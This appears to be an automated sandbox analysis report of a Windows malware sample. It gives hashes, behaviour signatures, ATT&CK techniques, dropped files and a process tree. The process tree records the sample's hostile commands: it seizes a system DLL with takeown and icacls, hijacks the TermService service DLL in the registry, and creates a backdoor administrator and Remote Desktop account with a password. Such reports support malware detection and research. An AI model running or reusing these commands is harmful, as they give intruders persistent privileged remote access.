Analysis

  • max time kernel
    155s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    09-03-2022 15:18

General

  • Target

    6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe

  • Size

    2.2MB

  • MD5

    f8c8ebd884d22e0866c217d24c16042f

  • SHA1

    0b9a6f2e1d735dae6f979c4bb357b565614b721d

  • SHA256

    6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba

  • SHA512

    3114b0e3984f6d566378a7dcda39ab6f48da57b71462f283e28d94e980b85d93f5a4e84ab74e3a83e90f8f148a768684fd45585fd7844207f448baeb93bc4787

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
    "C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\system32\wscript.exe
        wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps1
            5⤵
            • Deletes itself
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:392
            • C:\Windows\system32\takeown.exe
              "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1764
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1776
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1100
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2012
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2028
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1392
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1908
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:480
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f
              6⤵
              • Modifies registry key
              PID:1952
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:912
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                7⤵
                PID:1700
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
              6⤵
              PID:1760
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc By9zqDdC /add
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\system32\net.exe
      net.exe user wgautilacc By9zqDdC /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc By9zqDdC /add
        3⤵
        PID:764
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
        3⤵
        PID:876
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD
        3⤵
        PID:1660
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    1⤵
    PID:1116
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" wgautilacc /ADD
      2⤵
      PID:848
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
        3⤵
        PID:1764
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc By9zqDdC
    1⤵
    PID:1100
    • C:\Windows\system32\net.exe
      net.exe user wgautilacc By9zqDdC
      2⤵
      PID:772
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc By9zqDdC
        3⤵
        PID:1244

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Account Manipulation (T1098): 1
    Registry Run Keys / Startup Folder (T1060): 1
  • Defense Evasion
    Modify Registry (T1112): 2
    File Permissions Modification (T1222): 1
  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9887742.txt
    MD5 f63cb26ded5c82a6c82e5160933da4ed
    SHA1 9ae96ecea3c6c56a6e67e672cf9422d7427c04ff
    SHA256 7788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c
    SHA512 985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab

  • C:\Users\Admin\AppData\Local\Temp\changelog_66663.txt
    MD5 a97cf439052cb972928acb8d809f9edc
    SHA1 2bb935b6b2cf883315eacf3efec2b94bc1054961
    SHA256 9fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547
    SHA512 e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907

  • C:\Users\Admin\AppData\Local\Temp\changes_765543.txt
    MD5 4a6f27efae09ab64d0735d1c10d79b3e
    SHA1 8d72ddb83235b8b8632e7e9f8df91f566d3c73c6
    SHA256 0516aa8b986ed03badaf0c7a0db833ab64437900d82a833e22ca4d2715bfc58f
    SHA512 df1ef0fe044bb6c6e37b07676851cca3b0a849e52e8bfee79e04c0af1d5383862d5e9e17ab5e1c102d31caec84fbf9afa4121c2f89453c21aac8aebd761524b4

  • C:\Users\Admin\AppData\Local\Temp\install_455111.log
    MD5 0c34e2096fc530535d1fb38b8e9f68a6
    SHA1 ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
    SHA256 fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
    SHA512 0b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf

  • C:\Users\Admin\AppData\Local\Temp\log_455111.txt
    MD5 2c50ffba8c7d98a9cb5fec3c2a6913df
    SHA1 849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
    SHA256 f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
    SHA512 7d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750

  • C:\Users\Admin\AppData\Local\Temp\reactor.txt
    MD5 c2a9670c6617c3acc5cc5099b1437e42
    SHA1 6a83468dcaf55f74cd46fdf280ed8f354e6d93eb
    SHA256 c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95
    SHA512 d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1

  • C:\Users\Admin\AppData\Local\Temp\reactor.vbs
    MD5 c0a65d8cb9b5db7fdc9a178f8c80102d
    SHA1 733f50a72526784a61aaf77e5cddf13f904c1693
    SHA256 a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2
    SHA512 36dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539

  • C:\Users\Admin\AppData\Local\Temp\readme_455111.txt
    MD5 c1bf275bca659ad1cf0bd5c6d04cec7a
    SHA1 122d241329bffafc75d3e1e43e993d22d8180f41
    SHA256 c6e7c51172f2094e7240c3415681bd3836cf18a6260e184798986787396ed435
    SHA512 8a5e635ba906248406f392d9dfe9e11c5776d6c349097d641bd672968ea35a360ab7eb5062279307ba7864e44ee18f4dbc11e518a469a592fb8d18fca71baeaf

  • C:\Windows\system32\rfxvmt.dll
    MD5 dc39d23e4c0e681fad7a3e1342a2843c
    SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
    SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
    SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

  • \??\PIPE\lsarpc
    MD5 d41d8cd98f00b204e9800998ecf8427e
    SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\PIPE\samr
    MD5 d41d8cd98f00b204e9800998ecf8427e
    SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\PIPE\samr
    MD5 d41d8cd98f00b204e9800998ecf8427e
    SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\PIPE\samr
    MD5 d41d8cd98f00b204e9800998ecf8427e
    SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\PIPE\samr
    MD5 d41d8cd98f00b204e9800998ecf8427e
    SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Users\Admin\AppData\Local\Temp\nsyEEB3.tmp\System.dll
    MD5 fbe295e5a1acfbd0a6271898f885fe6a
    SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
    SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
    SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

  • \Windows\Help\lababa.bin
    MD5 ffa52c8fbd121f416f27f18bd2d0ad7f
    SHA1 08255a80df87379c303fb39aabc579ef1c09b037
    SHA256 f61fdfc36ee70147d7639f9d2dc25dd42353652d390961b3727ea990d7ef4b05
    SHA512 b8db846d9a8bf8561c0f81dea143253d55f4d94543a668eb6fa47a7c86e83845c5734f6a0706a6c9a742cf7fd2dcc971ac01ea223b7270928de4b218da775cb5

  • \Windows\Help\servicedll.dll
    MD5 def5e867485841d1f2f53db3f0407514
    SHA1 1fdfa582b37f4c0c06a998532856a89581a5fea0
    SHA256 25de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc
    SHA512 c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43

  • memory/392-67-0x000000000229B000-0x00000000022BA000-memory.dmp
    Filesize 124KB

  • memory/392-66-0x000000001B930000-0x000000001BC2F000-memory.dmp
    Filesize 3.0MB

  • memory/392-61-0x000007FEF2FA0000-0x000007FEF3AFD000-memory.dmp
    Filesize 11.4MB

  • memory/392-64-0x0000000002292000-0x0000000002294000-memory.dmp
    Filesize 8KB

  • memory/392-65-0x0000000002294000-0x0000000002297000-memory.dmp
    Filesize 12KB

  • memory/392-63-0x0000000002290000-0x0000000002292000-memory.dmp
    Filesize 8KB

  • memory/392-62-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
    Filesize 9.6MB

  • memory/696-58-0x000007FEFBD71000-0x000007FEFBD73000-memory.dmp
    Filesize 8KB

  • memory/1180-55-0x0000000075831000-0x0000000075833000-memory.dmp
    Filesize 8KB